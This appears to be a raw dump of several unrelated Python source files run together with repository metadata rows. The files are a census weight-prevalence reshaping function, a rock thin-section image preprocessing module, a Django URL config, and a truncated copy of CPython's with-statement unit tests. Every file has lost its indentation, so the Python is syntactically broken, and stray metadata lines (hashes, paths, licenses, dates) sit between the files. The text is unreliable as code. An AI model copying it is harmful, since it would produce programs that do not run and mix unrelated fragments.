# import census location data
# define an emptylist to create df from
all_df = []
# import files
if population_group == "Pediatric":
for filename in all_files:
print(f"Reading {filename}")
# read in csv
# Adding error-catching loop with output note for debugging
try:
df = pd.read_csv(filename, index_col=None, header=0)
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
except Exception as e:
print(f"File {filename} has no data, skipping")
continue
# read in sex as outputed from pq
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["sex"] = sex
# read in race as outputed from pq
race = (
df[df["Order"] == 7]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["race"] = race
# read in location code as outputed from pq
location_code = (
df[df["Order"] == 10]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# identify state
if len(location_code) == 2:
state_cd = location_code
df["zcta3"] = np.nan
else:
zcta3 = []
states = []
for loc in [l.strip() for l in location_code.split(",")]:
zcta3.append(loc[2:])
states.append(loc[:2])
df["zcta3"] = ",".join(zcta3)
states = list(set(states))
state_cd = ",".join(states)
state = us.states.lookup(state_cd)
df["state"] = state
# read in age as outputed from pq
age = (
df[df["Order"] == 5]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# converting to list
df["age"] = age
df["filename"] = filename
year = (
df[df["Order"] == 11]["Weight Category"]
.str.extract(":(.*)", expand=True)
.reset_index()
.at[0, 0]
)
df["year"] = year
# add dataframe to list
all_df.append(df)
if population_group == "Adult":
for filename in all_files:
print(f"Reading {filename}")
# read in csv
# Adding error-catching loop with output note for debugging
try:
df = pd.read_csv(filename, index_col=None, header=0)
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
except Exception as e:
print(f"File {filename} has no data, skipping")
continue
# read in sex as outputed from pq
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["sex"] = sex
# read in race as outputed from pq
race = (
df[df["Order"] == 8]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["race"] = race
# read in location code as outputed from pq
location_code = (
df[df["Order"] == 11]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# identify state
if len(location_code) == 2:
state_cd = location_code
df["zcta3"] = np.nan
else:
zcta3 = []
states = []
for loc in [l.strip() for l in location_code.split(",")]:
zcta3.append(loc[2:])
states.append(loc[:2])
df["zcta3"] = ",".join(zcta3)
states = list(set(states))
state_cd = ",".join(states)
state = us.states.lookup(state_cd)
df["state"] = state
# read in age as outputed from pq
age = (
df[df["Order"] == 5]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# converting to list
df["age"] = age
df["filename"] = filename
year = (
df[df["Order"] == 12]["Weight Category"]
.str.extract(":(.*)", expand=True)
.reset_index()
.at[0, 0]
)
df["year"] = year
# add dataframe to list
all_df.append(df)
all_df = pd.concat(all_df, axis=0, ignore_index=True, sort=True)
all_data = all_df[all_df["Order"] == 1].drop(columns="Order")
std_data = all_data.drop(
columns=[
"Crude Prevalence",
"Weighted Prevalence",
"Age-Adjusted Prevalence",
"Sample",
"Population",
]
)
prev_data = all_data.drop(
columns=[
"Crude Prevalence Standard Error",
"Weighted Prevalence Standard Error",
"Age-Adjusted Prevalence Standard Error",
"Sample",
"Population",
]
)
prev_data_melt = prev_data.melt(
id_vars=[
"Weight Category",
"sex",
"race",
"state",
"zcta3",
"age",
"filename",
"year",
],
value_name="Prevalence",
var_name="Prevalence type",
)
std_melt = std_data.melt(
id_vars=[
"Weight Category",
"sex",
"race",
"state",
"zcta3",
"age",
"filename",
"year",
],
value_name="Standard Error",
var_name="Prevalence type",
)
prev_data_melt["Prevalence type"] = prev_data_melt["Prevalence type"].str.split(
expand=True
)[0]
std_melt["Prevalence type"] = std_melt["Prevalence type"].str.split(expand=True)[0]
output_name = prev_data_melt.merge(
std_melt,
on=[
"Weight Category",
"sex",
"race",
"state",
"zcta3",
"age",
"filename",
"year",
"Prevalence type",
],
how="left",
)
output_name["Prevalence"] = output_name["Prevalence"].replace({".": np.NAN})
output_name["Standard Error"] = output_name["Standard Error"].replace({".": np.NAN})
return output_name
def create_population_df(file_path, population_group):
"""creates a data frame that includes the population numbers and the demographic data.
Population numbers come from American Community Survey
Parameters:
file_path: A folder with pq outputs to compare
population_group: Type of population, expected inputs ['Pediatric', 'Adult']
Returns:
A DataFrame where the rows are distinct demographic and prevalence numbers."""
# create a list of al the csvs in path
all_files = list(file_path.glob("**/*"))
# define an emptylist to create df from
all_df = []
# import files
if population_group == "Pediatric":
for filename in all_files:
print(f"Reading {filename}")
# read in csv
# Adding error-catching loop with output note for debugging
try:
df = pd.read_csv(filename, index_col=None, header=0)
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
except Exception as e:
print(f"File {filename} has no data, skipping")
continue
# read in sex as outputed from pq
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["sex"] = sex
# read in race as outputed from pq
race = (
df[df["Order"] == 7]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["race"] = race
# read in location code as outputed from pq
location_code = (
df[df["Order"] == 10]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# identify state
if len(location_code) == 2:
state_cd = location_code
df["zcta3"] = np.nan
else:
zcta3 = []
states = []
for loc in [l.strip() for l in location_code.split(",")]:
zcta3.append(loc[2:])
states.append(loc[:2])
df["zcta3"] = ",".join(zcta3)
states = list(set(states))
state_cd = ",".join(states)
state = us.states.lookup(state_cd)
df["state"] = state
# read in age as outputed from pq
age = (
df[df["Order"] == 5]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# converting to list
df["age"] = age
df["filename"] = filename
year = (
df[df["Order"] == 11]["Weight Category"]
.str.extract(":(.*)", expand=True)
.reset_index()
.at[0, 0]
)
df["year"] = year
# add dataframe to list
all_df.append(df)
if population_group == "Adult":
for filename in all_files:
print(f"Reading {filename}")
# read in csv
# Adding error-catching loop with output note for debugging
try:
df = pd.read_csv(filename, index_col=None, header=0)
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
except Exception as e:
print(f"File {filename} has no data, skipping")
continue
# read in sex as outputed from pq
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["sex"] = sex
# read in race as outputed from pq
race = (
df[df["Order"] == 8]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["race"] = race
# read in location code as outputed from pq
location_code = (
df[df["Order"] == 11]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# identify state
if len(location_code) == 2:
state_cd = location_code
df["zcta3"] = np.nan
else:
zcta3 = []
states = []
for loc in [l.strip() for l in location_code.split(",")]:
zcta3.append(loc[2:])
states.append(loc[:2])
df["zcta3"] = ",".join(zcta3)
states = list(set(states))
state_cd = ",".join(states)
state = us.states.lookup(state_cd)
df["state"] = state
# read in age as outputed from pq
age = (
df[df["Order"] == 5]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# converting to list
df["age"] = age
df["filename"] = filename
year = (
df[df["Order"] == 12]["Weight Category"]
.str.extract(":(.*)", expand=True)
.reset_index()
.at[0, 0]
)
df["year"] = year
# add dataframe to list
all_df.append(df)
all_df = pd.concat(all_df, axis=0, ignore_index=True, sort=True)
all_data = all_df[all_df["Order"] == 1].drop(columns="Order")
pop_data = all_data.drop(
columns=[
"Crude Prevalence",
"Weighted Prevalence",
"Age-Adjusted Prevalence",
"Crude Prevalence Standard Error",
"Weighted Prevalence Standard Error",
"Age-Adjusted Prevalence Standard Error",
]
)
output_name = pop_data.melt(
id_vars=[
"Weight Category",
"sex",
"race",
"state",
"zcta3",
"age",
"filename",
"year",
],
value_name="Population",
var_name="Population type",
)
output_name["Population"] = output_name["Population"].replace({".": np.NAN})
output_name["Population"] = (
output_name["Population"].astype(str).str.replace(",", "").astype(float)
)
return output_name
| 32.259494
| 90
| 0.444444
|
48546690bff0132eb5856b8f6eb44949c984db9f
| 3,077
|
py
|
Python
|
neural_rock/preprocess.py
|
LukasMosser/neural_rock_typing
|
5bd0f4a621939032b442826d6ed52ed19db9b5a0
|
[
"Apache-2.0"
] | 14
|
2021-05-16T23:21:16.000Z
|
2021-11-25T12:49:56.000Z
|
neural_rock/preprocess.py
|
LukasMosser/neural_rock_typing
|
5bd0f4a621939032b442826d6ed52ed19db9b5a0
|
[
"Apache-2.0"
] | 12
|
2021-05-18T20:57:12.000Z
|
2021-12-26T18:10:20.000Z
|
neural_rock/preprocess.py
|
LukasMosser/neural_rock_typing
|
5bd0f4a621939032b442826d6ed52ed19db9b5a0
|
[
"Apache-2.0"
] | 2
|
2021-05-17T09:20:56.000Z
|
2021-10-03T09:06:51.000Z
|
import pandas as pd
import os
from pathlib import Path
from typing import List
def get_leg194_data(df: pd.DataFrame) -> pd.DataFrame:
"""
Pandas pipe function to reduce only to Leg194 samples
"""
df = df.loc[df['Location'] == 'Leg194']
df = df.loc[df['Sample'].apply(lambda x: str(x).isdigit())]
df['Sample'] = df['Sample'].astype(int)
return df
def get_class_label_columns(df: pd.DataFrame) -> pd.DataFrame:
"""
Pandas pipe function to get only relevant data columns from data frame
"""
columns = ['Location', 'Sample', 'Dunham_class', 'Lucia_class', 'Macro_Dominant_type']
return df[columns]
def merge(df1: pd.DataFrame,
df2: pd.DataFrame) -> pd.DataFrame:
"""
Pandas pipe function to merge two dataframes
"""
df = df1.merge(df2, on=list(df1.columns), how='left')
return df
def drop_no_image(df: pd.DataFrame,
imaged_samples: List[int]) -> pd.DataFrame:
"""
Pandas pipe function to drop any rows from table for samples that have no images.
"""
df_temp = df[df['Sample'].isin(imaged_samples)]
return df_temp
def get_image_paths(base_path: Path = Path(".."),
rel_path: Path = Path("data/Images_PhD_Miami/Leg194/"),
imaging: str = "Xppl"):
"""
Gets all the local images paths for the ROI and the Imaged Thin Sections
"""
roi_ids = set([int(fname.split("_")[2].split("-")[0]) for fname in os.listdir(base_path.joinpath(rel_path, "ROI"))])
img_ids = []
img_paths = {}
for fname in os.listdir(base_path.joinpath(rel_path, "img")):
if fname.split(".")[1] == imaging:
sample_id = int(fname.split("-")[0].split("_")[1])
img_ids.append(sample_id)
img_paths[sample_id] = base_path.joinpath(rel_path, "img", fname)
img_ids = set(img_ids)
sample_ids = roi_ids.intersection(img_ids)
img_paths = {k: path for k, path in img_paths.items() if k in sample_ids}
roi_paths = {}
for fname in os.listdir(base_path.joinpath(rel_path, "ROI")):
sample_id = int(fname.split("_")[2].split("-")[0])
if sample_id in sample_ids:
roi_paths[sample_id] = base_path.joinpath(rel_path, "ROI", fname)
return sample_ids, img_paths, roi_paths
def load_label_dataframe(base_path: Path=Path("..")) -> pd.DataFrame:
"""
Data Preprocessing function to load the Leg194 dataset.
Uses pandas pipes to filter dataframe based on available images.
"""
sample_ids, image_paths, roi_paths = get_image_paths(base_path=base_path)
excel_path = base_path.joinpath("data/Data_Sheet_GDrive_new.xls")
df_dry = pd.read_excel(excel_path, sheet_name="Chaper_3_dry")
df_dry = df_dry.pipe(get_leg194_data).pipe(get_class_label_columns)
df_wet = pd.read_excel(excel_path, sheet_name="Chapter_3_water saturated")
df_wet = df_wet.pipe(get_leg194_data).pipe(get_class_label_columns)
df_label = df_wet.pipe(merge, df_dry)
df_imaged = df_label.pipe(drop_no_image, sample_ids)
return df_imaged
| 34.965909
| 120
| 0.662008
|
b8df2c01d8669aa4704bb98b728ecbf74b809add
| 404
|
py
|
Python
|
app/query/urls.py
|
scanner-research/esper-tv
|
179ef57d536ebd52f93697aab09bf5abec19ce93
|
[
"Apache-2.0"
] | 5
|
2019-04-17T01:01:46.000Z
|
2021-07-11T01:32:50.000Z
|
app/query/urls.py
|
DanFu09/esper
|
ccc5547de3637728b8aaab059b6781baebc269ec
|
[
"Apache-2.0"
] | 4
|
2019-11-12T08:35:03.000Z
|
2021-06-10T20:37:04.000Z
|
app/query/urls.py
|
DanFu09/esper
|
ccc5547de3637728b8aaab059b6781baebc269ec
|
[
"Apache-2.0"
] | 1
|
2020-09-01T01:15:44.000Z
|
2020-09-01T01:15:44.000Z
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^api/search', views.search, name='search'),
url(r'^api/schema', views.schema, name='schema'),
url(r'^api/subtitles', views.subtitles, name='subtitles'),
url(r'^api/labeled', views.labeled, name='labeled'),
url(r'^api/newthings', views.newthings, name='newthings'),
url(r'^', views.index, name='index')
]
| 33.666667
| 62
| 0.660891
|
66ff3b21f3bada9682ef670b8f80c6f550970fe2
| 26,156
|
py
|
Python
|
Lib/test/test_with.py
|
ystk/debian-python3.1
|
6241444a6994140621d1b143a2d6b311b184366a
|
[
"PSF-2.0"
] | null | null | null |
Lib/test/test_with.py
|
ystk/debian-python3.1
|
6241444a6994140621d1b143a2d6b311b184366a
|
[
"PSF-2.0"
] | null | null | null |
Lib/test/test_with.py
|
ystk/debian-python3.1
|
6241444a6994140621d1b143a2d6b311b184366a
|
[
"PSF-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Unit tests for the with statement specified in PEP 343."""
__author__ = "Mike Bland"
__email__ = "mbland at acm dot org"
import sys
import unittest
from collections import deque
from contextlib import GeneratorContextManager, contextmanager
from test.support import run_unittest
class MockContextManager(GeneratorContextManager):
def __init__(self, gen):
GeneratorContextManager.__init__(self, gen)
self.enter_called = False
self.exit_called = False
self.exit_args = None
def __enter__(self):
self.enter_called = True
return GeneratorContextManager.__enter__(self)
def __exit__(self, type, value, traceback):
self.exit_called = True
self.exit_args = (type, value, traceback)
return GeneratorContextManager.__exit__(self, type,
value, traceback)
def mock_contextmanager(func):
def helper(*args, **kwds):
return MockContextManager(func(*args, **kwds))
return helper
class MockResource(object):
def __init__(self):
self.yielded = False
self.stopped = False
@mock_contextmanager
def mock_contextmanager_generator():
mock = MockResource()
try:
mock.yielded = True
yield mock
finally:
mock.stopped = True
class Nested(object):
def __init__(self, *managers):
self.managers = managers
self.entered = None
def __enter__(self):
if self.entered is not None:
raise RuntimeError("Context is not reentrant")
self.entered = deque()
vars = []
try:
for mgr in self.managers:
vars.append(mgr.__enter__())
self.entered.appendleft(mgr)
except:
if not self.__exit__(*sys.exc_info()):
raise
return vars
def __exit__(self, *exc_info):
# Behave like nested with statements
# first in, last out
# New exceptions override old ones
ex = exc_info
for mgr in self.entered:
try:
if mgr.__exit__(*ex):
ex = (None, None, None)
except:
ex = sys.exc_info()
self.entered = None
if ex is not exc_info:
raise ex[0](ex[1]).with_traceback(ex[2])
class MockNested(Nested):
def __init__(self, *managers):
Nested.__init__(self, *managers)
self.enter_called = False
self.exit_called = False
self.exit_args = None
def __enter__(self):
self.enter_called = True
return Nested.__enter__(self)
def __exit__(self, *exc_info):
self.exit_called = True
self.exit_args = exc_info
return Nested.__exit__(self, *exc_info)
class FailureTestCase(unittest.TestCase):
def testNameError(self):
def fooNotDeclared():
with foo: pass
self.assertRaises(NameError, fooNotDeclared)
def testEnterAttributeError(self):
class LacksEnter(object):
def __exit__(self, type, value, traceback):
pass
def fooLacksEnter():
foo = LacksEnter()
with foo: pass
self.assertRaises(AttributeError, fooLacksEnter)
def testExitAttributeError(self):
class LacksExit(object):
def __enter__(self):
pass
def fooLacksExit():
foo = LacksExit()
with foo: pass
self.assertRaises(AttributeError, fooLacksExit)
def assertRaisesSyntaxError(self, codestr):
def shouldRaiseSyntaxError(s):
compile(s, '', 'single')
self.assertRaises(SyntaxError, shouldRaiseSyntaxError, codestr)
def testAssignmentToNoneError(self):
self.assertRaisesSyntaxError('with mock as None:\n pass')
self.assertRaisesSyntaxError(
'with mock as (None):\n'
' pass')
def testAssignmentToEmptyTupleError(self):
self.assertRaisesSyntaxError(
'with mock as ():\n'
' pass')
def testAssignmentToTupleOnlyContainingNoneError(self):
self.assertRaisesSyntaxError('with mock as None,:\n pass')
self.assertRaisesSyntaxError(
'with mock as (None,):\n'
' pass')
def testAssignmentToTupleContainingNoneError(self):
self.assertRaisesSyntaxError(
'with mock as (foo, None, bar):\n'
' pass')
def testEnterThrows(self):
class EnterThrows(object):
def __enter__(self):
raise RuntimeError("Enter threw")
def __exit__(self, *args):
pass
def shouldThrow():
ct = EnterThrows()
self.foo = None
with ct as self.foo:
pass
self.assertRaises(RuntimeError, shouldThrow)
self.assertEqual(self.foo, None)
def testExitThrows(self):
class ExitThrows(object):
def __enter__(self):
return
def __exit__(self, *args):
raise RuntimeError(42)
def shouldThrow():
with ExitThrows():
pass
self.assertRaises(RuntimeError, shouldThrow)
class ContextmanagerAssertionMixin(object):
def setUp(self):
self.TEST_EXCEPTION = RuntimeError("test exception")
def assertInWithManagerInvariants(self, mock_manager):
self.assertTrue(mock_manager.enter_called)
self.assertFalse(mock_manager.exit_called)
self.assertEqual(mock_manager.exit_args, None)
def assertAfterWithManagerInvariants(self, mock_manager, exit_args):
self.assertTrue(mock_manager.enter_called)
self.assertTrue(mock_manager.exit_called)
self.assertEqual(mock_manager.exit_args, exit_args)
def assertAfterWithManagerInvariantsNoError(self, mock_manager):
self.assertAfterWithManagerInvariants(mock_manager,
(None, None, None))
def assertInWithGeneratorInvariants(self, mock_generator):
self.assertTrue(mock_generator.yielded)
self.assertFalse(mock_generator.stopped)
def assertAfterWithGeneratorInvariantsNoError(self, mock_generator):
self.assertTrue(mock_generator.yielded)
self.assertTrue(mock_generator.stopped)
def raiseTestException(self):
raise self.TEST_EXCEPTION
def assertAfterWithManagerInvariantsWithError(self, mock_manager):
self.assertTrue(mock_manager.enter_called)
self.assertTrue(mock_manager.exit_called)
self.assertEqual(mock_manager.exit_args[0], RuntimeError)
self.assertEqual(mock_manager.exit_args[1], self.TEST_EXCEPTION)
def assertAfterWithGeneratorInvariantsWithError(self, mock_generator):
self.assertTrue(mock_generator.yielded)
self.assertTrue(mock_generator.stopped)
class NonexceptionalTestCase(unittest.TestCase, ContextmanagerAssertionMixin):
def testInlineGeneratorSyntax(self):
with mock_contextmanager_generator():
pass
def testUnboundGenerator(self):
mock = mock_contextmanager_generator()
with mock:
pass
self.assertAfterWithManagerInvariantsNoError(mock)
def testInlineGeneratorBoundSyntax(self):
with mock_contextmanager_generator() as foo:
self.assertInWithGeneratorInvariants(foo)
# FIXME: In the future, we'll try to keep the bound names from leaking
self.assertAfterWithGeneratorInvariantsNoError(foo)
def testInlineGeneratorBoundToExistingVariable(self):
foo = None
with mock_contextmanager_generator() as foo:
self.assertInWithGeneratorInvariants(foo)
self.assertAfterWithGeneratorInvariantsNoError(foo)
def testInlineGeneratorBoundToDottedVariable(self):
with mock_contextmanager_generator() as self.foo:
self.assertInWithGeneratorInvariants(self.foo)
self.assertAfterWithGeneratorInvariantsNoError(self.foo)
def testBoundGenerator(self):
mock = mock_contextmanager_generator()
with mock as foo:
self.assertInWithGeneratorInvariants(foo)
self.assertInWithManagerInvariants(mock)
self.assertAfterWithGeneratorInvariantsNoError(foo)
self.assertAfterWithManagerInvariantsNoError(mock)
def testNestedSingleStatements(self):
mock_a = mock_contextmanager_generator()
with mock_a as foo:
mock_b = mock_contextmanager_generator()
with mock_b as bar:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithManagerInvariants(mock_b)
self.assertInWithGeneratorInvariants(foo)
self.assertInWithGeneratorInvariants(bar)
self.assertAfterWithManagerInvariantsNoError(mock_b)
self.assertAfterWithGeneratorInvariantsNoError(bar)
self.assertInWithManagerInvariants(mock_a)
self.assertInWithGeneratorInvariants(foo)
self.assertAfterWithManagerInvariantsNoError(mock_a)
self.assertAfterWithGeneratorInvariantsNoError(foo)
class NestedNonexceptionalTestCase(unittest.TestCase,
ContextmanagerAssertionMixin):
def testSingleArgInlineGeneratorSyntax(self):
with Nested(mock_contextmanager_generator()):
pass
def testSingleArgUnbound(self):
mock_contextmanager = mock_contextmanager_generator()
mock_nested = MockNested(mock_contextmanager)
with mock_nested:
self.assertInWithManagerInvariants(mock_contextmanager)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithManagerInvariantsNoError(mock_contextmanager)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
def testSingleArgBoundToNonTuple(self):
m = mock_contextmanager_generator()
# This will bind all the arguments to nested() into a single list
# assigned to foo.
with Nested(m) as foo:
self.assertInWithManagerInvariants(m)
self.assertAfterWithManagerInvariantsNoError(m)
def testSingleArgBoundToSingleElementParenthesizedList(self):
m = mock_contextmanager_generator()
# This will bind all the arguments to nested() into a single list
# assigned to foo.
with Nested(m) as (foo):
self.assertInWithManagerInvariants(m)
self.assertAfterWithManagerInvariantsNoError(m)
def testSingleArgBoundToMultipleElementTupleError(self):
def shouldThrowValueError():
with Nested(mock_contextmanager_generator()) as (foo, bar):
pass
self.assertRaises(ValueError, shouldThrowValueError)
def testSingleArgUnbound(self):
mock_contextmanager = mock_contextmanager_generator()
mock_nested = MockNested(mock_contextmanager)
with mock_nested:
self.assertInWithManagerInvariants(mock_contextmanager)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithManagerInvariantsNoError(mock_contextmanager)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
def testMultipleArgUnbound(self):
m = mock_contextmanager_generator()
n = mock_contextmanager_generator()
o = mock_contextmanager_generator()
mock_nested = MockNested(m, n, o)
with mock_nested:
self.assertInWithManagerInvariants(m)
self.assertInWithManagerInvariants(n)
self.assertInWithManagerInvariants(o)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithManagerInvariantsNoError(m)
self.assertAfterWithManagerInvariantsNoError(n)
self.assertAfterWithManagerInvariantsNoError(o)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
def testMultipleArgBound(self):
mock_nested = MockNested(mock_contextmanager_generator(),
mock_contextmanager_generator(), mock_contextmanager_generator())
with mock_nested as (m, n, o):
self.assertInWithGeneratorInvariants(m)
self.assertInWithGeneratorInvariants(n)
self.assertInWithGeneratorInvariants(o)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithGeneratorInvariantsNoError(m)
self.assertAfterWithGeneratorInvariantsNoError(n)
self.assertAfterWithGeneratorInvariantsNoError(o)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
class ExceptionalTestCase(ContextmanagerAssertionMixin, unittest.TestCase):
def testSingleResource(self):
cm = mock_contextmanager_generator()
def shouldThrow():
with cm as self.resource:
self.assertInWithManagerInvariants(cm)
self.assertInWithGeneratorInvariants(self.resource)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(cm)
self.assertAfterWithGeneratorInvariantsWithError(self.resource)
def testNestedSingleStatements(self):
mock_a = mock_contextmanager_generator()
mock_b = mock_contextmanager_generator()
def shouldThrow():
with mock_a as self.foo:
with mock_b as self.bar:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithManagerInvariants(mock_b)
self.assertInWithGeneratorInvariants(self.foo)
self.assertInWithGeneratorInvariants(self.bar)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(mock_a)
self.assertAfterWithManagerInvariantsWithError(mock_b)
self.assertAfterWithGeneratorInvariantsWithError(self.foo)
self.assertAfterWithGeneratorInvariantsWithError(self.bar)
def testMultipleResourcesInSingleStatement(self):
cm_a = mock_contextmanager_generator()
cm_b = mock_contextmanager_generator()
mock_nested = MockNested(cm_a, cm_b)
def shouldThrow():
with mock_nested as (self.resource_a, self.resource_b):
self.assertInWithManagerInvariants(cm_a)
self.assertInWithManagerInvariants(cm_b)
self.assertInWithManagerInvariants(mock_nested)
self.assertInWithGeneratorInvariants(self.resource_a)
self.assertInWithGeneratorInvariants(self.resource_b)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(cm_a)
self.assertAfterWithManagerInvariantsWithError(cm_b)
self.assertAfterWithManagerInvariantsWithError(mock_nested)
self.assertAfterWithGeneratorInvariantsWithError(self.resource_a)
self.assertAfterWithGeneratorInvariantsWithError(self.resource_b)
def testNestedExceptionBeforeInnerStatement(self):
mock_a = mock_contextmanager_generator()
mock_b = mock_contextmanager_generator()
self.bar = None
def shouldThrow():
with mock_a as self.foo:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithGeneratorInvariants(self.foo)
self.raiseTestException()
with mock_b as self.bar:
pass
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(mock_a)
self.assertAfterWithGeneratorInvariantsWithError(self.foo)
# The inner statement stuff should never have been touched
self.assertEqual(self.bar, None)
self.assertFalse(mock_b.enter_called)
self.assertFalse(mock_b.exit_called)
self.assertEqual(mock_b.exit_args, None)
def testNestedExceptionAfterInnerStatement(self):
mock_a = mock_contextmanager_generator()
mock_b = mock_contextmanager_generator()
def shouldThrow():
with mock_a as self.foo:
with mock_b as self.bar:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithManagerInvariants(mock_b)
self.assertInWithGeneratorInvariants(self.foo)
self.assertInWithGeneratorInvariants(self.bar)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(mock_a)
self.assertAfterWithManagerInvariantsNoError(mock_b)
self.assertAfterWithGeneratorInvariantsWithError(self.foo)
self.assertAfterWithGeneratorInvariantsNoError(self.bar)
def testRaisedStopIteration1(self):
# From bug 1462485
@contextmanager
def cm():
yield
def shouldThrow():
with cm():
raise StopIteration("from with")
self.assertRaises(StopIteration, shouldThrow)
def testRaisedStopIteration2(self):
# From bug 1462485
class cm(object):
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def shouldThrow():
with cm():
raise StopIteration("from with")
self.assertRaises(StopIteration, shouldThrow)
def testRaisedStopIteration3(self):
# Another variant where the exception hasn't been instantiated
# From bug 1705170
@contextmanager
def cm():
yield
def shouldThrow():
with cm():
raise next(iter([]))
self.assertRaises(StopIteration, shouldThrow)
def testRaisedGeneratorExit1(self):
# From bug 1462485
@contextmanager
def cm():
yield
def shouldThrow():
with cm():
raise GeneratorExit("from with")
self.assertRaises(GeneratorExit, shouldThrow)
def testRaisedGeneratorExit2(self):
# From bug 1462485
class cm (object):
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def shouldThrow():
with cm():
raise GeneratorExit("from with")
self.assertRaises(GeneratorExit, shouldThrow)
def testErrorsInBool(self):
# issue4589: __exit__ return code may raise an exception
# when looking at its truth value.
class cm(object):
def __init__(self, bool_conversion):
class Bool:
def __bool__(self):
return bool_conversion()
self.exit_result = Bool()
def __enter__(self):
return 3
def __exit__(self, a, b, c):
return self.exit_result
def trueAsBool():
with cm(lambda: True):
self.fail("Should NOT see this")
trueAsBool()
def falseAsBool():
with cm(lambda: False):
self.fail("Should raise")
self.assertRaises(AssertionError, falseAsBool)
def failAsBool():
with cm(lambda: 1//0):
self.fail("Should NOT see this")
self.assertRaises(ZeroDivisionError, failAsBool)
class NonLocalFlowControlTestCase(unittest.TestCase):
def testWithBreak(self):
counter = 0
while True:
counter += 1
with mock_contextmanager_generator():
counter += 10
break
counter += 100 # Not reached
self.assertEqual(counter, 11)
def testWithContinue(self):
counter = 0
while True:
counter += 1
if counter > 2:
break
with mock_contextmanager_generator():
counter += 10
continue
counter += 100 # Not reached
self.assertEqual(counter, 12)
def testWithReturn(self):
def foo():
counter = 0
while True:
counter += 1
with mock_contextmanager_generator():
counter += 10
return counter
counter += 100 # Not reached
self.assertEqual(foo(), 11)
def testWithYield(self):
def gen():
with mock_contextmanager_generator():
yield 12
yield 13
x = list(gen())
self.assertEqual(x, [12, 13])
def testWithRaise(self):
counter = 0
try:
counter += 1
with mock_contextmanager_generator():
counter += 10
raise RuntimeError
counter += 100 # Not reached
except RuntimeError:
self.assertEqual(counter, 11)
else:
self.fail("Didn't raise RuntimeError")
class AssignmentTargetTestCase(unittest.TestCase):
def testSingleComplexTarget(self):
targets = {1: [0, 1, 2]}
with mock_contextmanager_generator() as targets[1][0]:
self.assertEqual(list(targets.keys()), [1])
self.assertEqual(targets[1][0].__class__, MockResource)
with mock_contextmanager_generator() as list(targets.values())[0][1]:
self.assertEqual(list(targets.keys()), [1])
self.assertEqual(targets[1][1].__class__, MockResource)
with mock_contextmanager_generator() as targets[2]:
keys = list(targets.keys())
keys.sort()
self.assertEqual(keys, [1, 2])
class C: pass
blah = C()
with mock_contextmanager_generator() as blah.foo:
self.assertEqual(hasattr(blah, "foo"), True)
def testMultipleComplexTargets(self):
class C:
def __enter__(self): return 1, 2, 3
def __exit__(self, t, v, tb): pass
targets = {1: [0, 1, 2]}
with C() as (targets[1][0], targets[1][1], targets[1][2]):
self.assertEqual(targets, {1: [1, 2, 3]})
with C() as (list(targets.values())[0][2], list(targets.values())[0][1], list(targets.values())[0][0]):
self.assertEqual(targets, {1: [3, 2, 1]})
with C() as (targets[1], targets[2], targets[3]):
self.assertEqual(targets, {1: 1, 2: 2, 3: 3})
class B: pass
blah = B()
with C() as (blah.one, blah.two, blah.three):
